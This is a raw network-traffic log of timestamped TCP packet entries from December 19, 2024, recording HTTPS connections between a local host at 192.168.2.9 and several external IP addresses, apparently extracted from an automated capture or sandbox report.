                                                                                                                                              Dec 19, 2024 07:52:29.969744921 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.969800949 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.969806910 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.969849110 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.969862938 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.970066071 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.970066071 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.989334106 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.034298897 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.038152933 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.039796114 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.178325891 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.187318087 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.187398911 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.187546015 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.190525055 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.195014954 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.233212948 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.233325958 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.233772039 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.236263037 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.273663044 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:30.273685932 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.285234928 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.370158911 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.412136078 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.412136078 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.415288925 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.417485952 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.418521881 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.531776905 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.531814098 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.534915924 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.535638094 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.536720037 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:30.536736012 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.537743092 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.537859917 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:30.538583994 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.538906097 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.727195978 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.727231026 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.727329016 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.729403019 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.729456902 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.729652882 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.734647989 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.735042095 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.735117912 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.735179901 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.752424955 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.771574020 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.775598049 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.778731108 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.871978998 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.891329050 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.895457029 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.898250103 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.918941021 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.923331022 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:30.948472977 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:30.948657990 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.969856977 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.969891071 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.969927073 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.969934940 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:30.969938040 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:30.970011950 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:30.989732027 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:30.989743948 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.019159079 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:31.036588907 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:31.083444118 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.087285995 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.087366104 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:31.090089083 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.091623068 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:31.091623068 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:31.110755920 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.111335993 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:31.136044025 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.136068106 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.136079073 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.136132956 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.136195898 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.136223078 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.136251926 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.136275053 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.136296034 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.136316061 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.136357069 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.197453976 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.197479963 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.211196899 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.213948965 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.214010954 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.214086056 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.214442015 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:31.214468956 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.275337934 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.317807913 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:31.408272028 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.408299923 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:31.408447981 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:32.991225958 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.130441904 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.226157904 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.226191998 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.226737976 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.230355978 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.230614901 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.232026100 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.279335022 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.738074064 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777829885 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777842045 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777888060 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777905941 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777909994 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777916908 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.777934074 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.777940035 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777966976 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.777978897 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.777978897 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.833220959 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.969497919 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.969520092 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.969568968 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.969605923 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.969616890 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.969616890 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.969633102 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.969644070 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:33.969659090 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.969667912 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:33.969727993 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.009798050 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.009818077 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.009860992 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.009871960 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.009890079 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.009946108 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.129574060 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.129630089 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.129707098 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.129725933 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.129751921 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.129769087 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.158196926 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.158216953 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.158324003 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.158339024 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.158418894 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.182605028 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.182631016 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.182776928 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.182792902 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.182848930 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.198749065 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.198770046 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.198815107 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.198827028 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.198874950 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.198874950 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.320307970 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.320360899 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.320372105 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.320539951 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.320549011 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.335328102 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.335345984 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.335417032 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.335428953 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.335448980 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.347810030 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.347826958 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.347902060 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.347913027 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.362276077 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.362291098 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.362637997 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.362648010 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.370681047 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.370747089 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.370795965 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.370795965 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.370809078 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.385293007 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.385308981 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.385365963 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.385376930 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.398736954 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.398752928 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.398804903 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.398813963 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.398876905 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.508366108 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.508390903 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.508454084 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.508481979 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519862890 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519875050 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519906998 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519925117 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519936085 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.519941092 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519964933 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519984961 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.519996881 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.519996881 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.520028114 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.529512882 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.529563904 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.529593945 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.529606104 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.529619932 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.529628038 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.529635906 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.529635906 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.529670000 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.540029049 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.540055037 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.540103912 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.540110111 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.540163994 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.550554991 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.550584078 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.550647974 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.550654888 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.550684929 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.555133104 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.555197954 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.555233955 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:34.555248976 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.555279016 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.555357933 CET49720443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:34.555381060 CET4434972018.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:40.216589928 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:40.216676950 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:40.216742992 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:40.547980070 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:40.548002958 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:40.637811899 CET49705443192.168.2.923.206.229.209
                                                                                                                                              Dec 19, 2024 07:52:40.757486105 CET4434970523.206.229.209192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:44.479832888 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:44.479876995 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:44.480200052 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:44.509196997 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:44.509222031 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:46.146274090 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:46.146368980 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:46.149745941 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:46.149760962 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:46.150003910 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:46.167104959 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:46.211328983 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.099216938 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.099244118 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.099260092 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.099349976 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.099370956 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.099395990 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.099415064 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.145098925 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.145126104 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.145221949 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.145240068 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.145251036 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.193372011 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.313103914 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.313126087 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.313313961 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.313334942 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.313409090 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.340915918 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.340931892 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.341012001 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.341027021 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.341087103 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.341087103 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.373846054 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.373864889 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.373930931 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.373956919 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.374008894 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.404575109 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.404596090 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.404723883 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.404747009 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.405019999 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.529783964 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.529809952 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.529845953 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.529872894 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.529961109 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.529961109 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.551769018 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.551788092 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.551867008 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.551892996 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.551934004 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.573911905 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.573928118 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.574101925 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.574115992 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.574184895 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.595983028 CET4434972545.125.67.168192.168.2.9
